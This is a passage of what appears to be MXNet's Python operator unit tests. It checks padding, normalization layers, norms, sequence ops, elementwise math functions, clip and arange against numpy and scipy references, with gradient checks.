numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
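# Compare mx.sym.Pad against np.pad for the given shape, padding and mode, then run a
# numeric gradient check.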
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y._bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
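# Numpy reference for instance normalization: normalize each sample/channel over its
# spatial dimensions, then scale by the broadcast weight (gamma) and shift by the bias (beta).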
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y._bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
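# Check L2Normalization against a numpy reference for 'channel', 'spatial' and 'instance' modes.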
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // (s[0] * s[1]), axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out._simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype == 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
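# Check LayerNorm against numpy references: forward output, optional finite-difference
# gradient checks, and optional analytic gradient checks for grad_req='write' and 'add'.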
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s._simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
for enforce_safe_acc in ['1', '0']:
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order == 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order == 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@pytest.mark.parametrize('enforce_safe_acc', ['1', '0'])
@pytest.mark.parametrize('dtype,forward_check_eps,backward_check_eps,in_shape_l,finite_grad_check_l', [
(np.float16, 1E-2, 1E-2, [(10, 6, 5), (10, 10)], [True, True]),
(np.float32, 1E-3, 1E-3, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]),
(np.float64, 1E-4, 1E-4, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False])
])
def test_layer_norm(enforce_safe_acc, dtype, forward_check_eps, backward_check_eps,
in_shape_l, finite_grad_check_l):
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
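# Validate SequenceLast/SequenceMask/SequenceReverse against the numpy references above,
# with and without explicit sequence lengths, for several shapes, axes and index dtypes.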
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@pytest.mark.skip(reason="Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
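# Generic checker for binary element-wise math ops: compare the forward result with a numpy
# reference and both input gradients with the supplied analytic derivative callables.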
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test._bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
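# Generic checker for unary element-wise math ops: forward against a numpy reference,
# backward against the supplied analytic derivative.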
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except ImportError:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
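# Rounding ops have zero gradient almost everywhere, so only the forward pass is checked here.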
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x._bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s._bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
def test_order():
ctx = default_context()
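# Ground-truth helper for topk/sort/argsort: returns the top-k values, their indices, or a
# 0/1 mask over the input, depending on ret_typ.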
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
